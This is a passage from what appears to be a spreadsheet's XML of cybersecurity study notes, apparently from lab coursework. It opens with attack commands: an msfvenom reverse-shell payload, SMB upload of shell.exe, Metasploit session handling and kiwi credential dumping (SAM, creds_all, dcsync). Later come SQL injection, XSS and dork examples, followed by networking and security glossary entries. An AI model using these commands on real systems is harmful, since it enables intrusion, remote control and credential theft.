    <t>msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.22.117.100 LPORT=4444 -f exe &gt; shell.exe</t>
  </si>
  <si>
    <t>Specify share on system by using SMBClient in Kali to interact with the Windows machine's file system over SMB</t>
  </si>
  <si>
    <t>smbclient //172.22.117.20/C$ -U DOMAINNAME/USERNAME</t>
  </si>
  <si>
    <t>smbclient //172.22.117.20/C$ -U megacorpone/tstark</t>
  </si>
  <si>
    <t>This connects to the C drive on the remote machine as the user tstark.</t>
  </si>
  <si>
    <t>SMB Upload syntax from LHOST to RHOST</t>
  </si>
  <si>
    <t>put FILENAME</t>
  </si>
  <si>
    <t>put shell.exe</t>
  </si>
  <si>
    <t>exploit meterepreter module to run in background</t>
  </si>
  <si>
    <t>exploit -j</t>
  </si>
  <si>
    <t>switch to the WMI module</t>
  </si>
  <si>
    <t>use scanner/smb/impacket/wmiexec</t>
  </si>
  <si>
    <t>switch to exploit module</t>
  </si>
  <si>
    <t>use exploit/multi/handler</t>
  </si>
  <si>
    <t>List all sessions</t>
  </si>
  <si>
    <t>sessions -i</t>
  </si>
  <si>
    <t>Lists all open sessions</t>
  </si>
  <si>
    <t>Select meterpreter session based on Session ID number</t>
  </si>
  <si>
    <t>sessions -i SESSIONID</t>
  </si>
  <si>
    <t>sessions -i 1</t>
  </si>
  <si>
    <t xml:space="preserve">Brings our session to the foreground, meaning any command we run on our host machine will be run on the Meterpreter shell on the target
</t>
  </si>
  <si>
    <t>kills all sessions</t>
  </si>
  <si>
    <t>sessions -K</t>
  </si>
  <si>
    <t>Kills session based on it's ID</t>
  </si>
  <si>
    <t>sessions -k 1</t>
  </si>
  <si>
    <t>Prints Meterpreter’s help page, which lists all possible commands</t>
  </si>
  <si>
    <t>?</t>
  </si>
  <si>
    <t>Prints user ID</t>
  </si>
  <si>
    <t>getuid</t>
  </si>
  <si>
    <t>getwd</t>
  </si>
  <si>
    <t>Prints the victim’s network information</t>
  </si>
  <si>
    <t>ifconfig</t>
  </si>
  <si>
    <t>Gathers system information</t>
  </si>
  <si>
    <t>sysinfo</t>
  </si>
  <si>
    <t>Uploads a file to the target</t>
  </si>
  <si>
    <t>upload</t>
  </si>
  <si>
    <t>Downloads a file from the target</t>
  </si>
  <si>
    <t>download</t>
  </si>
  <si>
    <t>Searches for resources, similar to the find command in Linux</t>
  </si>
  <si>
    <t>search</t>
  </si>
  <si>
    <t>Provides more detailed Windows privilege information</t>
  </si>
  <si>
    <t>run win_privs</t>
  </si>
  <si>
    <t>Runs a suite of Windows enumerations and stores the results on the attacking machine</t>
  </si>
  <si>
    <t>run win_enum</t>
  </si>
  <si>
    <t>list the permissions the user has</t>
  </si>
  <si>
    <t>getprivs</t>
  </si>
  <si>
    <t>backgrounds meterpreter session</t>
  </si>
  <si>
    <t>background</t>
  </si>
  <si>
    <t xml:space="preserve">shows current process ID shellnumber </t>
  </si>
  <si>
    <t>getpid</t>
  </si>
  <si>
    <t>shos all active processes on session</t>
  </si>
  <si>
    <t>loads kiwi command</t>
  </si>
  <si>
    <t>load kiwi</t>
  </si>
  <si>
    <t>kiwi command to dump content of SAM</t>
  </si>
  <si>
    <t>lsa_dump_sam</t>
  </si>
  <si>
    <t>Rkiwi command to retrieve all credetials</t>
  </si>
  <si>
    <t>creds_all</t>
  </si>
  <si>
    <t>kiwi_cmd lsadump::cache</t>
  </si>
  <si>
    <t>kiwi command to show ntlm hash of user</t>
  </si>
  <si>
    <t>dcsync_ntlm USERNAME</t>
  </si>
  <si>
    <t>dcsync_ntlm tstark</t>
  </si>
  <si>
    <t>Prints  Output</t>
  </si>
  <si>
    <t>print ("TEXT")</t>
  </si>
  <si>
    <t>print ("Hello, World!")</t>
  </si>
  <si>
    <t>Runs python file</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
        <color theme="1"/>
      </rPr>
      <t xml:space="preserve">python </t>
    </r>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
        <color rgb="FF000000"/>
      </rPr>
      <t>FILENAME.py</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
      </rPr>
      <t xml:space="preserve">python </t>
    </r>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>test.py</t>
    </r>
  </si>
  <si>
    <t>Makes python file executable</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
      </rPr>
      <t xml:space="preserve">chmod +x </t>
    </r>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>FILENAME.py</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
      </rPr>
      <t xml:space="preserve">chmod +x </t>
    </r>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>test.py</t>
    </r>
  </si>
  <si>
    <t>IF statement</t>
  </si>
  <si>
    <t>INTNAME = VALUE
if INTNAME == VALUE:
    print("INTNAME is 1.")</t>
  </si>
  <si>
    <t>x = 1
if x == 1:
    print("x is 1.")</t>
  </si>
  <si>
    <t>Defining an interger</t>
  </si>
  <si>
    <t>INTNAME = INPUT
print(INTNAME)</t>
  </si>
  <si>
    <t>myint = 7
print(myint)</t>
  </si>
  <si>
    <t>Defining string and printing results</t>
  </si>
  <si>
    <t>STRINGNAME = "TEXT"
print(STRINGNAME)</t>
  </si>
  <si>
    <t>mystring = "hello"
print(mystring)</t>
  </si>
  <si>
    <t>Defining and combining integers</t>
  </si>
  <si>
    <t>INT1 = 1
INT2 = 2
INT3 = INT1 + INT2
print(INT3)</t>
  </si>
  <si>
    <t>one = 1
two = 2
three = one + two
print(three)</t>
  </si>
  <si>
    <t>Defining and combining strings</t>
  </si>
  <si>
    <t>STRINGNAME1 = "TEXT"
STRINGNAME2 = "TEXT"
STRINGNAME3 = STRINGNAME1 + " " + STRINGNAME2
print(STRINGNAME3)</t>
  </si>
  <si>
    <t>hello = "hello"
world = "world"
helloworld = hello + " " + world
print(helloworld)</t>
  </si>
  <si>
    <t>Defining more than one Integer on the same line</t>
  </si>
  <si>
    <t>INT1, INT2, = VALUE1, VALUE2
print(INT1, INT2)</t>
  </si>
  <si>
    <t>a, b = 3, 4
print(a, b)</t>
  </si>
  <si>
    <t>Intended Query and Result</t>
  </si>
  <si>
    <t xml:space="preserve">select COLUMNNAME1, COLUMNNAME2 from TABLENAME where COLUMNNAME1 = 'USERNAME'
</t>
  </si>
  <si>
    <t xml:space="preserve">select userid, salary from salaries where userid = 'jsmith'
</t>
  </si>
  <si>
    <t>Modification of Intended Query to Create Unintended Results</t>
  </si>
  <si>
    <t xml:space="preserve">select COLUMNNAME1, COLUMNNAME2 from TABLENAME where COLUMNNAME1 = 'USERNAME' OR '1'='1'
</t>
  </si>
  <si>
    <t xml:space="preserve">select userid, salary from salaries where userid = 'jsmith' OR '1' = '1'
</t>
  </si>
  <si>
    <t>1 = TRUE, 0= FALSE
'1' = '1' = TRUE alias</t>
  </si>
  <si>
    <t>Adding the SQL UNION command to the query allows pulling data from other fields or tables.</t>
  </si>
  <si>
    <t>select COLUMNNAME1, COLUMNNAME2, COLUMNNAME3 from TABLENAME where COLUMNAME1 = '#'
union 
select COLUMNNAME1, COLUMNNAME2, COLUMNNAME3 from TABLENAME where '#' = '#'</t>
  </si>
  <si>
    <t>select first_name, last_name, password from users where user_id = '1'
union 
select first_name, last_name, password from users where '1' = '1'</t>
  </si>
  <si>
    <t>Pull data from all four fields, with the UNION and CONCAT command:</t>
  </si>
  <si>
    <t xml:space="preserve">select COLUMNNAME1, COLUMNNAME2, COLUMNNAME3 from TABLENAME where COLUMNAME1 = '#' UNION 
select CONCAT(COLUMNNAME1,COLUMNNAME2), COLUMNNAME3 from TABLENAME; </t>
  </si>
  <si>
    <t xml:space="preserve">select first_name, last_name from users where user_id = '1' UNION select CONCAT(first_name,last_name), password from users; </t>
  </si>
  <si>
    <t>XSS syntax to  alert  user with pop up prompt</t>
  </si>
  <si>
    <t>&lt;script&gt;alert("You have been hacked!")&lt;/script&gt;</t>
  </si>
  <si>
    <t>XSS syntax to  alert  session cookie</t>
  </si>
  <si>
    <t>&lt;script&gt;alert(document.cookie)&lt;/script&gt;</t>
  </si>
  <si>
    <t>View results specific from a website domain</t>
  </si>
  <si>
    <t>site:DOMAINNAME</t>
  </si>
  <si>
    <t>site:sans.org</t>
  </si>
  <si>
    <t>View results specific from a website domain, containing a filetype</t>
  </si>
  <si>
    <t>site:DOMAINNAME type:FILETYPE</t>
  </si>
  <si>
    <t>site:sans.org type:pdf</t>
  </si>
  <si>
    <t>View results specific from a website domain, containing a keyword</t>
  </si>
  <si>
    <t>site:DOMAINNAME intext:KEYWORD</t>
  </si>
  <si>
    <t>site:sans.org intext:passwords</t>
  </si>
  <si>
    <t>Find Information with keyword  in title and url</t>
  </si>
  <si>
    <t>intitle:"KEYWORDINTITLE" inurl:KEYWORDINURL</t>
  </si>
  <si>
    <t>intitle:"index of" inurl:ftp</t>
  </si>
  <si>
    <t>Find information about the website</t>
  </si>
  <si>
    <t>info:DOMAINNAME</t>
  </si>
  <si>
    <t>info:www.sans.org</t>
  </si>
  <si>
    <t>Find websites related to the website</t>
  </si>
  <si>
    <t>related:DOMAINNAME</t>
  </si>
  <si>
    <t>related:www.stanford.edu</t>
  </si>
  <si>
    <t>Find text located within the website</t>
  </si>
  <si>
    <t>intext:KEYWORD site:DOMAINNAME</t>
  </si>
  <si>
    <t>intext:email site:megacorpone.com</t>
  </si>
  <si>
    <t>Find websites starting with admin domains</t>
  </si>
  <si>
    <t>site:admin.*</t>
  </si>
  <si>
    <t>Find websites with all admin domains</t>
  </si>
  <si>
    <t>site:/admin.*</t>
  </si>
  <si>
    <t>Find websites with anything admin  in url</t>
  </si>
  <si>
    <t>inurl:admin</t>
  </si>
  <si>
    <t>aws security hub get-findings</t>
  </si>
  <si>
    <t>aws get-findings</t>
  </si>
  <si>
    <t>Module</t>
  </si>
  <si>
    <t>Course</t>
  </si>
  <si>
    <t>Chain of custody:</t>
  </si>
  <si>
    <t>This is necessary to keep track of who was holding the evidence at any time.</t>
  </si>
  <si>
    <t>Digital Forensics</t>
  </si>
  <si>
    <t>Introduction to Cyber Security</t>
  </si>
  <si>
    <t>Exchangeable Image File Format (EXIF ):</t>
  </si>
  <si>
    <t>A standard for saving metadata to image files.</t>
  </si>
  <si>
    <t>Forensics</t>
  </si>
  <si>
    <t>The application of science to investigate crimes and establish facts.</t>
  </si>
  <si>
    <t>Private-sector investigations:</t>
  </si>
  <si>
    <t>The investigations carried out by corporate bodies by assigning a private investigator, whether in-house or outsourced.</t>
  </si>
  <si>
    <t>Proper search authority:</t>
  </si>
  <si>
    <t>Investigators cannot commence without the proper legal authority.</t>
  </si>
  <si>
    <t>Public-sector investigations:</t>
  </si>
  <si>
    <t>The investigations carried out by government and law enforcement agencies.</t>
  </si>
  <si>
    <t>Repeatability:</t>
  </si>
  <si>
    <t>The findings of digital forensics can be reproduced as long as the proper skills and tools are available.</t>
  </si>
  <si>
    <t>The digital forensics investigation is concluded with a report that shows the evidence related to the case that was discovered.</t>
  </si>
  <si>
    <t>Use of validated tools:</t>
  </si>
  <si>
    <t>The tools used in digital forensics should be validated to ensure that they work correctly.</t>
  </si>
  <si>
    <t>Validation with mathematics:</t>
  </si>
  <si>
    <t>Using a special kind of mathematical function, called a hash function, we can confirm that a file has not been modified.</t>
  </si>
  <si>
    <t>A single connection connecting the devices, known as a backbone cable.</t>
  </si>
  <si>
    <t>Intro to LAN</t>
  </si>
  <si>
    <t>Pre Security</t>
  </si>
  <si>
    <t>Octet:</t>
  </si>
  <si>
    <t xml:space="preserve">Each of the decimal numbers in an IP address. </t>
  </si>
  <si>
    <t>Sending data across the loop until it reaches the destined device, using other devices along the loop to forward the data.</t>
  </si>
  <si>
    <t>Connect networks and pass data between them.</t>
  </si>
  <si>
    <t>Devices are individually connected via a central networking device such as a switch or hub.</t>
  </si>
  <si>
    <t>Subnet Mask:</t>
  </si>
  <si>
    <t>Number of four bytes (32 bits), ranging from 0 to 255 (0-255).</t>
  </si>
  <si>
    <t>Splitting up a network into smaller, miniature networks within itself.</t>
  </si>
  <si>
    <t xml:space="preserve">Aggregate multiple devices on a network such as computers, printers, or any other networking-capable device using ethernet. </t>
  </si>
  <si>
    <t>Network Address:</t>
  </si>
  <si>
    <t>This address identifies the start of the actual network and is used to identify a network's existence.</t>
  </si>
  <si>
    <t>Host Address:</t>
  </si>
  <si>
    <t>An IP address here is used to identify a device on the subnet</t>
  </si>
  <si>
    <t>Default Gateway (Router IP)</t>
  </si>
  <si>
    <t xml:space="preserve">Special address assigned to a device on the network that is capable of sending information to another network </t>
  </si>
  <si>
    <t>Actions on Objectives:</t>
  </si>
  <si>
    <t>Attacker has achieved their objectives.</t>
  </si>
  <si>
    <t>Antivirus software:</t>
  </si>
  <si>
    <t>You install an antivirus on your computer or smartphone to detect malicious files and block them from executing.</t>
  </si>
  <si>
    <t>Command &amp; Control:</t>
  </si>
  <si>
    <t>The successful installation of the malware provides the attacker with a command and control ability over the target system.</t>
  </si>
  <si>
    <t>Computer Network:</t>
  </si>
  <si>
    <t>a group of computers and devices connected with each other.</t>
  </si>
  <si>
    <t>Cyber Kill Chain:</t>
  </si>
  <si>
    <t xml:space="preserve">Steps taken in breaking into a target network </t>
  </si>
  <si>
    <t>Delivery:</t>
  </si>
  <si>
    <t>Delivering the “weaponized” file to the target via any feasible method,</t>
  </si>
  <si>
    <t>Exploitation:</t>
  </si>
  <si>
    <t>When the user opens the malicious file, their system executes the malicious component.</t>
  </si>
  <si>
    <t>Firewall Appliance:</t>
  </si>
  <si>
    <t>The firewall allows and blocks connections based on a predefined set of rules. It restricts what can enter and what can leave a network.</t>
  </si>
  <si>
    <t>FTP server:</t>
  </si>
  <si>
    <t>File Transfer Protocol and is used to transfer files between machines.</t>
  </si>
  <si>
    <t>Hardware Solutions:</t>
  </si>
  <si>
    <t>The devices you set up in your network to protect your network security.</t>
  </si>
  <si>
    <t xml:space="preserve">Host firewall: </t>
  </si>
  <si>
    <t xml:space="preserve">Unlike the firewall appliance, a hardware device, a host firewall is a program that ships as part of your system, or it is a program that you install on your system. </t>
  </si>
  <si>
    <t>HTTP server:</t>
  </si>
  <si>
    <t>Hypertext Transfer Protocol and is used for the web. Whenever you are browsing the web, you are using HTTP or HTTPS. HTTPS is the secure (encrypted) version of HTTP.</t>
  </si>
  <si>
    <t>Installation:</t>
  </si>
  <si>
    <t>Installation of the malware on the target system.</t>
  </si>
  <si>
    <t>Intrusion Detection System (IDS) appliance:</t>
  </si>
  <si>
    <t>An IDS detects system and network intrusions and intrusion attempts. It tries to detect attackers’ attempts to break into your network.</t>
  </si>
  <si>
    <t xml:space="preserve">Intrusion Prevention System (IPS) appliance: </t>
  </si>
  <si>
    <t>An IPS blocks detected intrusions and intrusion attempts. It aims to prevent attackers from breaking into your network.</t>
  </si>
  <si>
    <t>Different hardware and software solutions to achieve the set security goals.</t>
  </si>
  <si>
    <t xml:space="preserve">Recon: </t>
  </si>
  <si>
    <t>The step where the attacker tries to learn as much as possible about the target.</t>
  </si>
  <si>
    <t>SSH server:</t>
  </si>
  <si>
    <t>Secure Shell and is used for secure remote login. In other words, it allows you to execute commands on a remote system securely.</t>
  </si>
  <si>
    <t xml:space="preserve">Virtual Private Network (VPN) concentrator appliance: </t>
  </si>
  <si>
    <t>A VPN ensures that the network traffic cannot be read nor altered by a third party. It protects the confidentiality (secrecy) and integrity of the sent data.</t>
  </si>
  <si>
    <t>Weaponization:</t>
  </si>
  <si>
    <t>Preparing a file with a malicious component</t>
  </si>
  <si>
    <t>Computer Hardware:</t>
  </si>
  <si>
    <t xml:space="preserve"> All the tangible computer parts and peripherals, eg.  includes the screen, the keyboard, the printer, the USB flash memory, and the desktop board.</t>
  </si>
  <si>
    <t xml:space="preserve">Operating System Security
</t>
  </si>
  <si>
    <t>Motherboard:</t>
  </si>
  <si>
    <t>The main part of a computer, and all the other pieces of hardware from keyboard and mouse to screen and printer connect to it.</t>
  </si>
  <si>
    <t>The layer sitting between the hardware and the applications and programs you are running.</t>
  </si>
  <si>
    <t>A Security Operations Center (SOC):</t>
  </si>
  <si>
    <t>A team of IT security professionals tasked with monitoring a company’s network and systems 24 hours a day, seven days a week.</t>
  </si>
  <si>
    <t>Security Operations</t>
  </si>
  <si>
    <t>Domain Name System (DNS) activity:</t>
  </si>
  <si>
    <t>DNS Server resolution logs the DNS query for monitoring.</t>
  </si>
  <si>
    <t>Dynamic Host Configuration Protocol (DHCP) logs:</t>
  </si>
  <si>
    <t>Responsible for assigning an IP address to the systems that try to connect to a network.</t>
  </si>
  <si>
    <t>EXIFTOOL:</t>
  </si>
  <si>
    <t>Linux tool used to read and write metadata in various file types</t>
  </si>
  <si>
    <t>Firewall logs:</t>
  </si>
  <si>
    <t>Reveals information about what packets passed or tried to pass through the firewall.</t>
  </si>
  <si>
    <t>Intrusion detection:</t>
  </si>
  <si>
    <t xml:space="preserve">Used to detect and log intrusions and suspicious packets. </t>
  </si>
  <si>
    <t xml:space="preserve">IP addresses: </t>
  </si>
  <si>
    <t>Malware analysis:</t>
  </si>
  <si>
    <t>Recovery of malicious programs that reached the network.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor security posture: </t>
  </si>
  <si>
    <t>This is the primary role of the SOC, and it includes monitoring the network and computers for security alerts and notifications and responding to them as the need dictates.</t>
  </si>
  <si>
    <t>Network security monitoring (NSM):</t>
  </si>
  <si>
    <t>Focuses on monitoring the network data and analyzing the traffic to detect signs of intrusions.</t>
  </si>
  <si>
    <t>Port numbers:</t>
  </si>
  <si>
    <t xml:space="preserve">Communication over the network allowing programs to communicate. </t>
  </si>
  <si>
    <t>Proactive services:</t>
  </si>
  <si>
    <t>The tasks handled by the SOC without any indicator of an intrusion.</t>
  </si>
  <si>
    <t>It is essential to report incidents and alarms. Reporting is necessary to ensure a smooth workflow and to support compliance requirements.</t>
  </si>
  <si>
    <t xml:space="preserve">Server logs: </t>
  </si>
  <si>
    <t>Local logs of server activity.</t>
  </si>
  <si>
    <t>Threat hunting:</t>
  </si>
  <si>
    <t>Focuses on learning about potential adversaries and their tactics and techniques to improve the company’s defences.</t>
  </si>
  <si>
    <t>Vulnerability management:</t>
  </si>
  <si>
    <t>Finding vulnerabilities in the company systems and patching (fixing) them.</t>
  </si>
  <si>
    <t>Access Control:</t>
  </si>
  <si>
    <t>Ensures that each user can only access files (documents, images, etc.) related to their role or work.</t>
  </si>
  <si>
    <t>Authentication:</t>
  </si>
  <si>
    <t>Ability to prove that the user is whom they claim to be.</t>
  </si>
  <si>
    <t>Cryptography:</t>
  </si>
  <si>
    <t>The processes of encryption and decryption of data</t>
  </si>
  <si>
    <t>Database Server:</t>
  </si>
  <si>
    <t>Used to store information in nan organized way. Also responsible for reading, searching, and writing to the database.</t>
  </si>
  <si>
    <t>Converts the ciphertext back into the original cleartext using the secret key.</t>
  </si>
  <si>
    <t>Scrambles cleartext into ciphertext, which should be gibberish to anyone who does not have the secret key to decrypt it.</t>
  </si>
  <si>
    <t>Identification:</t>
  </si>
  <si>
    <t>The ability to identify a user uniquely</t>
  </si>
  <si>
    <t>Injection:</t>
  </si>
  <si>
    <t>A vulnerability in the web application where the user can insert malicious code as part of their input.</t>
  </si>
  <si>
    <t>Web Application:</t>
  </si>
  <si>
    <t>Similar “program” that we can use without installation as long as we have a modern standard web browser.</t>
  </si>
  <si>
    <t>Media Access Control (MAC) Address:</t>
  </si>
  <si>
    <t>A twelve-character hexadecimal number split into two's and separated by a colon uniquely identifying a device on a network based on their physical network interface.</t>
  </si>
  <si>
    <t>What is Networking?</t>
  </si>
  <si>
    <t>Ping (packet inter-network groper):</t>
  </si>
  <si>
    <t>Uses Internet Control Message Protocol (ICMP) packets to determine the performance of a connection between devices</t>
  </si>
  <si>
    <t>Address Resolution Protocol (ARP)</t>
  </si>
  <si>
    <t>Technology that is responsible for allowing devices to identify themselves on a network. Allows a device to associate its MAC address with an IP address on the network.</t>
  </si>
  <si>
    <t xml:space="preserve">OSI Model
</t>
  </si>
  <si>
    <t>Dynamic Host Configuration Protocol (DHCP) :</t>
  </si>
  <si>
    <t>Client/server protocol that automatically provides an Internet Protocol (IP) host with its IP address and other related configuration information such as the subnet mask and default gateway.</t>
  </si>
  <si>
    <t xml:space="preserve">Open Systems Interconnection Model (OSI):
</t>
  </si>
  <si>
    <t>Absolute fundamental 7-point model used in networking which provides a framework dictating how all networked devices will send, receive and interpret data.  7. Application, 6. Presentation, 5. Session, 4. Transport, 3. Network, 2. Datalink, 1. Physical.</t>
  </si>
  <si>
    <t>Occurance when pieces of information get added to data</t>
  </si>
  <si>
    <t xml:space="preserve">OSI Layer 7: Application </t>
  </si>
  <si>
    <t>OSI Layer 6:  Presentation</t>
  </si>
  <si>
    <t>OSI Layer 5: Session</t>
  </si>
  <si>
    <t>OSI Layer 4: Transport</t>
  </si>
  <si>
    <t>This protocol reserves a constant connection between the two devices for the amount of time it takes for the data to be sent and received. Reliable because it sends over complete data in packets and is used for emails, sending files, etc.</t>
  </si>
  <si>
    <t>User Datagram Protocol (UDP)</t>
  </si>
  <si>
    <t>UDP does not require a connection to be established. UDP is suitable for protocols that rely on fast queries, such as DNS, and for protocols that prioritise real-time communications, such as audio/video conferencing and broadcast.</t>
  </si>
  <si>
    <t>OSI  Layer 3: Network</t>
  </si>
  <si>
    <t>OSI  Layer 2: Data Link</t>
  </si>
  <si>
    <t>OSI  Layer 1: Physical</t>
  </si>
  <si>
    <t>Packets &amp; Frames</t>
  </si>
  <si>
    <t>Small pieces of data that, when forming together, make a larger piece of information or message.</t>
  </si>
  <si>
    <t xml:space="preserve">
Packets &amp; Frames</t>
  </si>
  <si>
    <t>Header - Time to Live</t>
  </si>
  <si>
    <t>This field sets an expiry timer for the packet to not clog up your network if it never manages to reach a host or escape!</t>
  </si>
  <si>
    <t>Header - Checksum</t>
  </si>
  <si>
    <t>This field provides integrity checking for protocols such as TCP/IP. If any data is changed, this value will be different from what was expected and therefore corrupt.</t>
  </si>
  <si>
    <t xml:space="preserve">Header - Source Address	</t>
  </si>
  <si>
    <t>The IP address of the device that the packet is being sent from so that data knows where to return to.</t>
  </si>
  <si>
    <t>Header - Destination Address</t>
  </si>
  <si>
    <t>The device's IP address the packet is being sent to so that data knows where to travel next.</t>
  </si>
  <si>
    <t>TCP Header - Source Port</t>
  </si>
  <si>
    <t>This value is the port opened by the sender to send the TCP packet from. This value is chosen randomly (out of the ports from 0-65535 that aren't already in use at the time).</t>
  </si>
  <si>
    <t>TCP Header - Destination Port</t>
  </si>
  <si>
    <t>This value is the port number that an application or service is running on the remote host (the one receiving data); for example, a webserver running on port 80. Unlike the source port, this value is not chosen at random.</t>
  </si>
  <si>
    <t>TCP Header - Source IP</t>
  </si>
  <si>
    <t>This is the IP address of the device that is sending the packet.</t>
  </si>
  <si>
    <t>TCP Header - Destination IP</t>
  </si>
  <si>
    <t>This is the IP address of the device that the packet is destined for.</t>
  </si>
  <si>
    <t>TCP Header - Sequence Number</t>
  </si>
  <si>
    <t xml:space="preserve">When a connection occurs, the first piece of data transmitted is given a random number. </t>
  </si>
  <si>
    <t>TCP Header - Acknowledgement Number</t>
  </si>
  <si>
    <t>After a piece of data has been given a sequence number, the number for the next piece of data will have the sequence number + 1.</t>
  </si>
  <si>
    <t>TCP Header - Checksum</t>
  </si>
  <si>
    <t>This value is what gives TCP integrity. A mathematical calculation is made where the output is remembered. When the receiving device performs the mathematical calculation, the data must be corrupt if the output is different from what was sent.</t>
  </si>
  <si>
    <t>TCP Header - Data</t>
  </si>
  <si>
    <t>This header is where the data, i.e. bytes of a file that is being transmitted, is stored.</t>
  </si>
  <si>
    <t>TCP Header - Flag</t>
  </si>
  <si>
    <t>This header determines how the packet should be handled by either device during the handshake process. Specific flags will determine specific behaviours, which is what we'll come on to explain below.</t>
  </si>
  <si>
    <t>Chapter</t>
  </si>
  <si>
    <t>Administrative Controls</t>
  </si>
  <si>
    <t>Directives, guidelines or advisories aimed at the people within the organization. (Security Culture)</t>
  </si>
  <si>
    <t>Chapter 1: Security Principles</t>
  </si>
  <si>
    <t>Physical Controls</t>
  </si>
  <si>
    <t>Controls implemented through a tangible mechanism, eg. Badge Readers, Automatic door locks.</t>
  </si>
  <si>
    <t>The management of Administrative, Technical, and Physical controls of the business to protect the CIA Triad of assets.</t>
  </si>
  <si>
    <t>Technical Controls</t>
  </si>
  <si>
    <t>controls that computer systems and networks directly implement and provide automated protection from unauthorized access or misuse, facilitate detection of security violations and support security requirements for applications and data.</t>
  </si>
  <si>
    <t>Adequate Security</t>
  </si>
  <si>
    <t>Security commensurate with the risk and the magnitude of harm resulting from the loss, misuse or unauthorized access to or modification of information.</t>
  </si>
  <si>
    <t>Security Concepts of Information Assurance</t>
  </si>
  <si>
    <t>Artificial Intelligence</t>
  </si>
  <si>
    <t>The ability of computers and robots to simulate human intelligence and behavior.</t>
  </si>
  <si>
    <t>Authentication</t>
  </si>
  <si>
    <t>Access control process validating that the identity being claimed by a user or entity is known to the system, by comparing one or more factors of authentication.</t>
  </si>
  <si>
    <t>Authorization</t>
  </si>
  <si>
    <t>The right or permission that is granted to a system entity to access a system.</t>
  </si>
  <si>
    <t>Ensuring timely and reliable access to and use of information by  authorized users.</t>
  </si>
  <si>
    <t>Baseline</t>
  </si>
  <si>
    <t>The minimum level of security required by standards or organisation</t>
  </si>
  <si>
    <t>Biometrics</t>
  </si>
  <si>
    <t>Physiological characteristics that is used to authenticate themselves.</t>
  </si>
  <si>
    <t>Bot</t>
  </si>
  <si>
    <t>Malicious code that acts like a remotely controlled “robot” for an attacker, with other Trojan and worm capabilities.</t>
  </si>
  <si>
    <t>Classified or Sensitive Information</t>
  </si>
  <si>
    <t>Trade secrets, research, business plans and intellectual property.</t>
  </si>
  <si>
    <t>Confidentiality</t>
  </si>
  <si>
    <t>Protect the data that needs protection, yet permit access to authorized individuals.</t>
  </si>
  <si>
    <t>Criticality</t>
  </si>
  <si>
    <t>A measure of the degree to which an organisation depends on the information system for the success of the mission or of a business function.</t>
  </si>
  <si>
    <t>Data Integrity</t>
  </si>
  <si>
    <t>The assurance that data has not been altered in an unauthorized manner.</t>
  </si>
  <si>
    <t>General Data Protection Regulation (GDPR)</t>
  </si>
  <si>
    <t>European Union legislation addressing personal privacy, deeming it a human right.</t>
  </si>
  <si>
    <t>Integrity</t>
  </si>
  <si>
    <t>Measures the degree to which something is whole and complete, internally consistent and correct.</t>
  </si>
  <si>
    <t>Multi-Factor Authentication (MFA)</t>
  </si>
  <si>
    <t>Using 2 or all 3 authentication methods for identity verification. Knowledge based (know), Token Based (have), Characteristics Based (are).</t>
  </si>
  <si>
    <t>Non-Repudiation</t>
  </si>
  <si>
    <t>The protection against an individual falsely denying having performed a particular action</t>
  </si>
  <si>
    <t>Personally Identifiable Information (PII)</t>
  </si>
  <si>
    <t>Any data about an individual that could be used to identify them.</t>
  </si>
  <si>
    <t>Privacy</t>
  </si>
  <si>
    <t>The right of an individual to control the distribution of information about themselves.</t>
  </si>
  <si>
    <t>Protected Health Information (PHI)</t>
  </si>
  <si>
    <t>Information regarding one’s health status</t>
  </si>
  <si>
    <t>Sensitivity</t>
  </si>
  <si>
    <t>A measure of the importance assigned to information by its owner, or the purpose of denoting its need for protection.</t>
  </si>
  <si>
    <t>Single Factor Authentication (SFA)</t>
  </si>
  <si>
    <t>Use of just one of the three available factors to carry out authentication.</t>
  </si>
  <si>
    <t>State Awareness</t>
  </si>
  <si>
    <t>The condition an entity is in at a point in time</t>
  </si>
  <si>
    <t>System Integrity</t>
  </si>
  <si>
    <t>The maintenance of a known good configuration and expected operational function as the system processes the information.</t>
  </si>
  <si>
    <t>The Health Insurance Portability and Accountability Act (HIPAA)</t>
  </si>
  <si>
    <t>Federal regulatory standards outlining the lawful use and disclosure of protected health information in the United States.</t>
  </si>
  <si>
    <t>Tokens</t>
  </si>
  <si>
    <t>Physical object a user possesses to authenticate themselves.</t>
  </si>
  <si>
    <t>Asset</t>
  </si>
  <si>
    <t>Something in need of protection</t>
  </si>
  <si>
    <t>Risk Management Process</t>
  </si>
  <si>
    <t>Information Security Risk</t>
  </si>
  <si>
    <t>Adverse impacts that result from the possibility of unauthorized access, use, disclosure, disruption, modification or destruction of information and/or information systems.</t>
  </si>
  <si>
    <t>Likelihood</t>
  </si>
  <si>
    <t xml:space="preserve"> The probability that a potential vulnerability may be exercised within the construct of the associated threat environment.</t>
  </si>
  <si>
    <t>Likelihood of Occurrence</t>
  </si>
  <si>
    <t>A weighted factor based on a subjective analysis of the probability that a given threat is capable of exploiting a given vulnerability or set of vulnerabilities.</t>
  </si>
  <si>
    <t>Qualitative Risk analysis</t>
  </si>
  <si>
    <t>Method to assign a descriptor of low, medium, or high risk.</t>
  </si>
  <si>
    <t>Quantitative Risk analysis</t>
  </si>
  <si>
    <t>Method to assign statistical risk probabilities and a monetarized value based on loss or gain.</t>
  </si>
  <si>
    <t>Risk</t>
  </si>
  <si>
    <t>Measure of the extent to which an entity is threatened by a potential circumstance or event.</t>
  </si>
  <si>
    <t>Risk Acceptance</t>
  </si>
  <si>
    <t>Taking no action to reduce the likelihood of a risk occurring. (Low Risk / Low Impact)</t>
  </si>
  <si>
    <t>Risk Assessment</t>
  </si>
  <si>
    <t>The process of identifying, estimating and prioritizing risks to an organization’s operations (including its mission, functions, image and reputation), assets, individuals, other organizations and even the nation.</t>
  </si>
  <si>
    <t>Risk Avoidance</t>
  </si>
  <si>
